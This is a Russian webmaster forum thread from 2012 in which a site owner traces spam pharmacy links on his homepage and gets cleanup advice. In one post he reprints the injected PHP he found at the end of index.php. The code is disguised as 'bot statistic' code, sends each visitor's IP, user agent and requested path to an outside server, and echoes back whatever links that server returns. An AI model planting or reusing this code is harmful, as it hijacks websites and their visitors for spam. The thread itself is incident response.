X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали сайт и повесили чужую ссылку, как решить проблему?
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:03; Ответить: Gek
Сообщение #1


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Ситуация такая, сегодня обнаружил внизу главной страницы сайта чужую ссылку. Вот код:

    </td>
   </tr>
  </table>
</center>
</body>
</html>

<a href="http://чужой_сайт.ком">название сайта с виагрой</a>


Сам файл низа - чистый, страничка можно сказать статическая, это не CSM, главная страничка собирается из:

верх.html
индекс.php
низ.html

Так вот, хостер разводит руками, мол ищи проблему сам, это у тебя где-то чего-то там. Сам я мало в этом чего понимаю, подскажите как можно решить проблему?

Пароль ФТП и cPanel поменял.


Поблагодарили: (1)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rokot
rokot
сообщение 3.9.2012, 22:12; Ответить: rokot
Сообщение #2


Loading...
******

Группа: Super Moderator
Сообщений: 1669
Регистрация: 6.7.2012
Поблагодарили: 953 раза
Репутация:   136  


ищите в .htaccess и index.php


--------------------
Дешевый и быстрый хостинг (US,RU сервера) | ПРОМОКОД на 10% - OFF10
Сайты на WordPress от 1500 рублей!


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:15; Ответить: Gek
Сообщение #3


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Скажие, что искать - название чужого сайта?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LoraDi
LoraDi
сообщение 3.9.2012, 22:18; Ответить: LoraDi
Сообщение #4


С Joomla на ты...
*****

Группа: Active User
Сообщений: 836
Регистрация: 11.12.2010
Из: Молдовы
Поблагодарили: 295 раз
Репутация:   73  


Смотрите может есть где такая надпись "base64" ссылка может быть закодирована...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:27; Ответить: Gek
Сообщение #5


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Сейчас посмотрел, все чисто и в .htaccess и index.php

Да, и еще. Чужих ссылок несколько (и они разные):

На мой_сайт.ком одна, а на мой_сайт.ком/индекс.php ссылка совсем другая. Сдается мне, что они могут и по целому сайту расползтись.

Сообщение отредактировал Gek - 3.9.2012, 22:29
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
loginmain
loginmain
сообщение 3.9.2012, 23:32; Ответить: loginmain
Сообщение #6


Оптимизатор
*******

Группа: Super Moderator
Сообщений: 4361
Регистрация: 5.10.2008
Из: UA
Поблагодарили: 2012 раз
Репутация:   199  


МОжет кто-то сапу поставил вам?? Внимательно проверяйте на лишний код все.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 4.9.2012, 7:13; Ответить: Gek
Сообщение #7


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Кстати этот сайт участвует в Сапе. Когда убирал мой код Сапы, то чужая ссылка оставалась. Буду думать и по этому поводу.

Нашел проблему, чужой код был действительно в файле индекс.php. Но его вписали в самый низ и далеко так вбок, поэтому в редакторе не смог его сразу найти (проглядел). Не знаю можно ли тут выложить этот код, но выложу, может кому будет интересно.

Вопрос остается, как он туда попал? Может надо хостера поменять? Или пароли мои были слабые и их просто подобрали (не менял давно).

Чужой код, был в самом конце индекс.php (выводились ссылки на сайт с виагрой).

         <?php
    /*This code use for global bot statistic*/     $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); /*Looks for google search bot*/     $sReferer = '';     if(isset($_SERVER['HTTP_REFERER']) === true)     {         $sReferer = strtolower($_SERVER['HTTP_REFERER']);     }     if(!(strpos($sUserAgent, 'google') === false)) /*Bot comes*/     {         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer) );     } else     {         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));     } /*Statistic code end*/
?>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
loginmain
loginmain
сообщение 4.9.2012, 8:55; Ответить: loginmain
Сообщение #8


Оптимизатор
*******

Группа: Super Moderator
Сообщений: 4361
Регистрация: 5.10.2008
Из: UA
Поблагодарили: 2012 раз
Репутация:   199  


(Gek @ 4.9.2012, 6:13) *
Вопрос остается, как он туда попал? Может надо хостера поменять? Или пароли мои были слабые и их просто подобрали (не менял давно).

Сохраняли пароль на компе в фтп-менеджерах? Если да, то однозначно через комп. Никогда не сохраняйте пароли, всегда набирайте. Хостер в последнюю очередь виноват, вначале ищем проблемы у себя.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
djalin
djalin
сообщение 4.9.2012, 11:57; Ответить: djalin
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 8.5.2011
Поблагодарили: 87 раз
Репутация:   9  


Поищите так же в других папках - лутше проверить весь сайт


--------------------
Услуги: установка WP + плагины. Установка SAPE: wordpress/phpbb/Quick.Cms/некоторые самописы (php)
Хостинг - The HostVille
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 4.9.2012, 14:38; Ответить: Gek
Сообщение #10


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Сохраняли пароль на компе в фтп-менеджерах?

Сохранял. smile.gif

У меня Касперский, вроде как доверяю ему - вирусов быть не должно.

djalin, плохо то, что у меня там не один сайт. Этот сайт главный, но там есть еще несколько сайтов на дополнительных доменах, сейчас сижу проверяю их, по мере возможности. Вроде пока ничего не нашел)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Как организовать индексацию защищенных pdf с ключами и ссылками
И разместить pdf на внешних жирных ресурсах
0 kirch 206 Сегодня, 18:05
автор: kirch
Открытая тема (нет новых ответов) [Книга] Налог на глупость: Как я заработал в интернете 5,5 млн рублей.
7 kotovsky 2105 Сегодня, 8:30
автор: kolor73
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыСайт о Туризме Wordpress
4 tbr82 635 Вчера, 19:53
автор: 1da1
Открытая тема (нет новых ответов) Король социалок 7: Генератор видео и 5 способов как на нём заработать
0 Volgar 377 Вчера, 17:09
автор: Volgar
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКак носить смартфоны диагональю 5.5 - 6.4 дюйма?
41 Room 5065 Вчера, 15:28
автор: Chezarius


 



RSS Текстовая версия Сейчас: 20.5.2018, 20:01
Дизайн